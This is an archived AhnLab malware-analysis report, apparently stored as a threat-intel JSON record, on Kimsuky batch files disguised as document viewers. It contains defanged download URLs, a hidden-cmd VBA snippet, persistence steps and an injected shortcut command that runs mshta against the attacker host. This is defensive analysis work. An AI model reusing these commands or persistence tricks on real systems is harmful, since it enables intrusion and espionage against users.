{
	"id": "01b9ed36-efcf-4d8d-90aa-b1786352567c",
	"created_at": "2026-04-06T00:07:22.49089Z",
	"updated_at": "2026-04-10T13:12:34.042053Z",
	"deleted_at": null,
	"sha1_hash": "b75e71acd40f14db201d8f0b5e69b976bd6bd15b",
	"title": "Malicious Batch File (*.bat) Disguised as a Document Viewer Being Distributed (Kimsuky)",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1899960,
	"plain_text": "Malicious Batch File (*.bat) Disguised as a Document Viewer Being\r\nDistributed (Kimsuky)\r\nBy ATCP\r\nPublished: 2023-06-28 · Archived: 2026-04-05 22:30:29 UTC\r\nAhnLab Security Emergency response Center (ASEC) has confirmed the distribution of malware in the form of a batch file\r\n(*.bat). This malware is designed to download various scripts based on the anti-malware process, including AhnLab\r\nproducts, installed in the user’s environment. Based on the function names used by the malware and the downloaded URL\r\nparameters, it is suspected to have been distributed by the Kimsuky group.\r\nAlthough the exact distribution path of the malware has not been confirmed, it appears that it is being distributed via email.\r\nAs shown below, the identified batch files have been disguised to appear as viewers for document programs such as Word\r\nand HWP.\r\nDate of Identification Filename\r\nMar. 22 docview.bat\r\nMar. 28 pdfview.bat\r\nJun. 12 hwp.bat\r\nJun. 20 docxview.bat\r\nJun. 21 pdf.bat\r\nTable 1. Files that have been identified.\r\nWhen the batch file is executed, it accesses Google Drive and Docs through the “explorer” command. Through this process,\r\nit executes a document file uploaded to Google Docs or Drive, making it appear as if a viewer program was executed. The\r\nexecuted documents mostly contain content related to the military or unification.\r\nDocument Title Accessed URL\r\nMilitary Security\r\nReview of the U.S. 
Indo-Pacific Strategy – Focusing on the U.S. Indo-Pacific Command.pdf | hxxps://drive.google.com/file/d/1e41uC2ZTYvTc3CvS6wIKox22AGdP4nFB/view?usp=sharing\r\nConsent Form_Princeton Study.pdf | hxxps://drive.google.com/file/d/1tI4J95-7HDGES8e6oHR-wu0cXD8wHPUc/view?usp=sharing\r\nBuilding a Prosperous Homeland through the Principle of Liberal Democracy: Achieving Reunification of the Korean Peninsula.pdf | hxxps://docs.google.com/document/d/1NJfvSpdku2PW3gwg0dnoELrlVp3CEGB4mtNIFE4bO usp=sharing\r\nNK_nuclear_threat.docx | hxxps://docs.google.com/document/d/1C3h0agp3E6Z4a9z-YxnMTgP3Fd9y8n2C/edit?rtpof=true\u0026sd=true\r\nKorea-U.S. Alliance (Global Defense)-new.hwp | hxxps://drive.google.com/file/d/1rCws6IDhJvynpM3TOSv3IKGWNKXI5uH9/view?usp=sharin\r\nTable 2. Identified document titles and URL addresses\r\nhttps://asec.ahnlab.com/en/55219/\r\nPage 1 of 6\r\nAfterward, it uses the “wmic” command to identify various anti-malware processes. The threat actor downloads different scripts based on the type of anti-malware process that is running in the user’s environment.\r\nChecked AV Products (Process Name) | Download Path and Filename | Download URL\r\nKaspersky (avpui.exe, avp.exe) | %appdata%\\Microsoft\\Templates\\Normal.dotm | hxxp://joongang[.]site/pprb/sec/ca.php?na=dot_kasp.gif\r\nKaspersky (avpui.exe, avp.exe) | c:\\users\\public\\videos\\video.vbs | hxxp://joongang[.]site/pprb/sec/ca.php?na=reg0.gif\r\nAvast (avastui.exe, avgui.exe) | %appdata%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\onenote.vbs | hxxp://joongang[.]site/pprb/sec/ca.php?na=sh_ava.gif\r\nAhnlab (v3) | %appdata%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\onenote.vbs | hxxps://joongang[.]site/pprb/sec/ca.php?na=sh_vb.gif\r\nAhnlab (v3) | %appdata%\\asdfg.vbs | hxxps://joongang[.]site/pprb/sec/ca.php?na=vbs.gif\r\nALYac (ayagent.aye), or if there are no matching products | %appdata%\\asdfg.vbs | hxxps://joongang[.]site/pprb/sec/ca.php?na=vbs.gif\r\nTable 2. Downloaded file for each identified AV process\r\nWhen a Kaspersky (avpui.exe, avp.exe) process is identified\r\nTo replace the default document template, Normal.dotm, the threat actor terminates the Word process and downloads a dotm file from hxxp://joongang[.]site/pprb/sec/ca.php?na=dot_kasp.gif. They then replace Normal.dotm with the downloaded file.\r\nThe downloaded Normal.dotm file contains embedded VBA code that executes cmd.exe in a hidden window, as shown below. Currently, it simply executes cmd.exe, but various commands could be executed depending on the threat actor’s intentions.\r\nSub autoopen()\r\n On Error Resume Next\r\n a = Shell(\"cmd.exe\", 0)\r\nEnd Sub\r\nAfterward, it downloads “video.vbs” from hxxp://joongang[.]site/pprb/sec/ca.php?na=reg0.gif and registers it under the following registry key to ensure continuous execution.\r\nRegistry: HKEY_CURRENT_USER\\Software\\Microsoft\\Command Processor\r\nName: AutoRun\r\nValue: wscript.exe c:\\users\\public\\videos\\video.vbs\r\nWhen the “video.vbs” file is executed, it checks whether a file named “qwer.gif” exists in the %appdata%\\Microsoft folder. If the file exists, it renames it to “qwer.bat” and then executes it. If “qwer.gif” does not exist, it downloads and executes the file from hxxp://joongang[.]site/pprb/sec/d.php?na=battmp.\r\nThe command identified from the above URL at the time of analysis is as follows.\r\nWhen an Avast (avastui.exe, avgui.exe) process is identified\r\nThe threat actor downloads an additional script from hxxp://joongang[.]site/pprb/sec/ca.php?na=sh_ava.gif and saves it in the startup programs folder under the name onenote.vbs to ensure it runs continuously.\r\nWhen the “onenote.vbs” file is executed, it uses WMI to collect the Description of Win32_Battery and Win32_Process. It also downloads the previously mentioned “video.vbs” file and performs its run key registration.\r\nAdditionally, it modifies the location or properties of browser and email-related shortcuts (*.lnk files) that exist in specific folders. This modification is done so that when the user clicks the shortcut to launch Outlook or a browser, the threat actor’s malicious command is executed as well.\r\nTo achieve this, the threat actor moves the browser and email-related shortcut files from C:\\Users\\Public\\Desktop to C:\\Users\\[username]\\Desktop\\[filename]. They then modify the arguments in the properties of the shortcut files that exist in the folders listed in the table below.\r\nFolder Name | LNK’s Target File Name | Changed LNK Arguments\r\nC:\\Users\\Public\\Desktop (Moved to C:\\Users\\[username]\\Desktop and properties changed); C:\\Users\\[username]\\Desktop; %appdata%\\Microsoft\\Internet Explorer\\Quick Launch | msedge.exe, chrome.exe, outlook.exe, whale.exe, firefox.exe | cmd.exe /c start [filename] [previous arguments] [command configured by the threat actor]\r\nTable 3. Folder paths and target filenames of the LNK files to be modified\r\nAt the time of analysis, the onenote.vbs file downloaded upon confirmation of an Avast process did not contain the [command set by the threat actor]. However, various malicious commands can still be executed according to the threat actor’s intentions.\r\nAfterward, the previously collected information is transmitted to hxxps://joongang[.]site/pprb/sec/r.php. The transmitted data is as follows.\r\n[Battery Information] [Process Information] ENTER bin short ok\r\nFormat of transmitted data\r\nWhen an Ahnlab (v3) process is identified\r\nThis procedure is similar to the Avast case. An additional script file is downloaded from hxxps://joongang[.]site/pprb/sec/ca.php?na=sh_vb.gif and saved in the startup programs folder under the name onenote.vbs.\r\nThis script performs the same functionality as the previously described onenote.vbs (?na=sh_ava.gif). However, the onenote.vbs file downloaded from hxxps://joongang[.]site/pprb/sec/ca.php?na=sh_vb.gif does contain the [command set by the threat actor] that is inserted into the arguments when the properties of the shortcut files are changed:\r\n\u0026 echo Set ws = CreateObject(\"\"WScript.Shell\"\"): a=ws.run(\"\"mshta.exe hxxps://joongang[.]site/pprb/sec/t1.hta\"\",0,false) \u003e \"\"%appdata%\\1.vbs\"\" \u0026 start wscript.exe /b \"\"%appdata%\\1.vbs\r\nTherefore, every time a user executes the shortcut file for a browser or Outlook, the script located at hxxps://joongang[.]site/pprb/sec/t1.hta is saved and executed as %appdata%\\1.vbs. At the time of analysis, the URL contained only the following command to close the window:\r\nOn Error Resume Next\r\nwindow.close()\r\nAfterward, in all cases other than when a Kaspersky (avpui.exe, avp.exe) or Avast (avastui.exe, avgui.exe) process is identified, an additional script is downloaded from hxxps://joongang[.]site/pprb/sec/ca.php?na=vbs.gif and saved as asdfg.vbs in the %appdata% folder.\r\nThe downloaded asdfg.vbs file is registered in the task scheduler as CleanupTemporaryState and scheduled to run every 41 minutes.\r\nLike the video.vbs file, the asdfg.vbs file downloads and executes additional scripts from hxxps://joongang[.]site/pprb/sec/d.php?na=battmp.\r\nAt the time of analysis, behaviors such as downloading executable files were not present. However, because the malware downloads and executes various scripts, there is a possibility of additional unidentified malicious activities being carried out based on the commands present in those scripts. Furthermore, the threat actor replaced the default document template, Normal.dotm, and modified browser and email-related shortcut files. Therefore, since malicious scripts may be installed when shortcut files (*.lnk) for Word documents, Internet browsers like Chrome, and Outlook are executed, extra caution is advised.\r\n[File Detection]\r\nDownloader/BAT.Generic.S2300 (2023.06.26.03)\r\nTrojan/VBS.Agent.SC190255 (2023.06.30.00)\r\nTrojan/VBS.Agent.SC190256 (2023.06.30.00)\r\nDownloader/VBS.Agent.SC190254 (2023.06.30.00)\r\n[Behavior Detection]\r\nExecution/MDP.Curl.M4675\r\nExecution/MDP.Curl.M11183\r\nExecution/EDR.Curl.M11182\r\n[References]\r\nhttps://www.sentinelone.com/labs/kimsuky-evolves-reconnaissance-capabilities-in-new-global-campaign/\r\nMD5\r\n00119ed01689e76cb7f33646693ecd6a\r\n7d79901b01075e29d8505e72d225ff52\r\n8536d838dcdd026c57187ec2c3aec0f6\r\na7ac7d100184078c2aa5645552794c19\r\nURL\r\nhttp[:]//joongang[.]site/doc/\r\nhttp[:]//joongang[.]site/docx/\r\nhttp[:]//joongang[.]site/pprb/sec/\r\nhttp[:]//namsouth[.]com/gopprb/OpOpO/\r\nhttp[:]//staradvertiser[.]store/signal/\r\nAdditional IOCs are available on AhnLab TIP.\r\nSource: https://asec.ahnlab.com/en/55219/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://asec.ahnlab.com/en/55219/"
	],
	"report_names": [
		"55219"
	],
	"threat_actors": [
		{
			"id": "191d7f9a-8c3c-442a-9f13-debe259d4cc2",
			"created_at": "2022-10-25T15:50:23.280374Z",
			"updated_at": "2026-04-10T02:00:05.305572Z",
			"deleted_at": null,
			"main_name": "Kimsuky",
			"aliases": [
				"Kimsuky",
				"Black Banshee",
				"Velvet Chollima",
				"Emerald Sleet",
				"THALLIUM",
				"APT43",
				"TA427",
				"Springtail"
			],
			"source_name": "MITRE:Kimsuky",
			"tools": [
				"Troll Stealer",
				"schtasks",
				"Amadey",
				"GoBear",
				"Brave Prince",
				"CSPY Downloader",
				"gh0st RAT",
				"AppleSeed",
				"Gomir",
				"NOKKI",
				"QuasarRAT",
				"Gold Dragon",
				"PsExec",
				"KGH_SPY",
				"Mimikatz",
				"BabyShark",
				"TRANSLATEXT"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "760f2827-1718-4eed-8234-4027c1346145",
			"created_at": "2023-01-06T13:46:38.670947Z",
			"updated_at": "2026-04-10T02:00:03.062424Z",
			"deleted_at": null,
			"main_name": "Kimsuky",
			"aliases": [
				"G0086",
				"Emerald Sleet",
				"THALLIUM",
				"Springtail",
				"Sparkling Pisces",
				"Thallium",
				"Operation Stolen Pencil",
				"APT43",
				"Velvet Chollima",
				"Black Banshee"
			],
			"source_name": "MISPGALAXY:Kimsuky",
			"tools": [
				"xrat",
				"QUASARRAT",
				"RDP Wrapper",
				"TightVNC",
				"BabyShark",
				"RevClient"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "c8bf82a7-6887-4d46-ad70-4498b67d4c1d",
			"created_at": "2025-08-07T02:03:25.101147Z",
			"updated_at": "2026-04-10T02:00:03.846812Z",
			"deleted_at": null,
			"main_name": "NICKEL KIMBALL",
			"aliases": [
				"APT43 ",
				"ARCHIPELAGO ",
				"Black Banshee ",
				"Crooked Pisces ",
				"Emerald Sleet ",
				"ITG16 ",
				"Kimsuky ",
				"Larva-24005 ",
				"Opal Sleet ",
				"Ruby Sleet ",
				"SharpTongue ",
				"Sparking Pisces ",
				"Springtail ",
				"TA406 ",
				"TA427 ",
				"THALLIUM ",
				"UAT-5394 ",
				"Velvet Chollima "
			],
			"source_name": "Secureworks:NICKEL KIMBALL",
			"tools": [
				"BabyShark",
				"FastFire",
				"FastSpy",
				"FireViewer",
				"Konni"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "71a1e16c-3ba6-4193-be62-be53527817bc",
			"created_at": "2022-10-25T16:07:23.753455Z",
			"updated_at": "2026-04-10T02:00:04.73769Z",
			"deleted_at": null,
			"main_name": "Kimsuky",
			"aliases": [
				"APT 43",
				"Black Banshee",
				"Emerald Sleet",
				"G0086",
				"G0094",
				"ITG16",
				"KTA082",
				"Kimsuky",
				"Larva-24005",
				"Larva-25004",
				"Operation Baby Coin",
				"Operation Covert Stalker",
				"Operation DEEP#DRIVE",
				"Operation DEEP#GOSU",
				"Operation Kabar Cobra",
				"Operation Mystery Baby",
				"Operation Red Salt",
				"Operation Smoke Screen",
				"Operation Stealth Power",
				"Operation Stolen Pencil",
				"SharpTongue",
				"Sparkling Pisces",
				"Springtail",
				"TA406",
				"TA427",
				"Thallium",
				"UAT-5394",
				"Velvet Chollima"
			],
			"source_name": "ETDA:Kimsuky",
			"tools": [
				"AngryRebel",
				"AppleSeed",
				"BITTERSWEET",
				"BabyShark",
				"BoBoStealer",
				"CSPY Downloader",
				"Farfli",
				"FlowerPower",
				"Gh0st RAT",
				"Ghost RAT",
				"Gold Dragon",
				"GoldDragon",
				"GoldStamp",
				"JamBog",
				"KGH Spyware Suite",
				"KGH_SPY",
				"KPortScan",
				"KimJongRAT",
				"Kimsuky",
				"LATEOP",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Lovexxx",
				"MailPassView",
				"Mechanical",
				"Mimikatz",
				"MoonPeak",
				"Moudour",
				"MyDogs",
				"Mydoor",
				"Network Password Recovery",
				"PCRat",
				"ProcDump",
				"PsExec",
				"ReconShark",
				"Remote Desktop PassView",
				"SHARPEXT",
				"SWEETDROP",
				"SmallTiger",
				"SniffPass",
				"TODDLERSHARK",
				"TRANSLATEXT",
				"Troll Stealer",
				"TrollAgent",
				"VENOMBITE",
				"WebBrowserPassView",
				"xRAT"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434042,
	"ts_updated_at": 1775826754,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/b75e71acd40f14db201d8f0b5e69b976bd6bd15b.pdf",
		"text": "https://archive.orkl.eu/b75e71acd40f14db201d8f0b5e69b976bd6bd15b.txt",
		"img": "https://archive.orkl.eu/b75e71acd40f14db201d8f0b5e69b976bd6bd15b.jpg"
	}
}